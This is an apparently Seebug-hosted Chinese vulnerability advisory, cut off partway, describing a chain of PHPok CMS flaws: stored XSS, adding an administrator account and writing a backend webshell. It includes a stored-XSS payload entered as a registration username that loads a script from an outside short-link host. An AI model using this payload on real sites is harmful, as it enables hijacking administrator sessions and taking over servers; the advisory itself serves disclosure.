Phpok漏洞礼包组合可shell

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

### 简要描述: Phpok漏洞礼包,组合可shell ### 详细说明: 1.2处存储行xss 2.添加管理员帐号密码+利用点 3.后台写shell 1. 第一处 我们先来注册一个帐号。 [<img src="https://images.seebug.org/upload/201409/22233205fbf9b598f3bccc2e7224289048fcce2f.png" alt="图片1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201409/22233205fbf9b598f3bccc2e7224289048fcce2f.png) 其中帐号这内容为 `a');document.write('<script/src=//t.cn/XXXXXXX></script>')//` 注册好之后。 后台 [<img src="https://images.seebug.org/upload/201409/22233913788388ad877103716ca132a473b82392.png" alt="图片17.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201409/22233913788388ad877103716ca132a473b82392.png) [<img src="https://images.seebug.org/upload/201409/222332423b825e9f3751ea79c3a3955dabd61c8d.png" alt="图片3.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201409/222332423b825e9f3751ea79c3a3955dabd61c8d.png) 需要点击才能激活xss [<img...

0%
暂无可用Exp或PoC
当前有0条受影响产品信息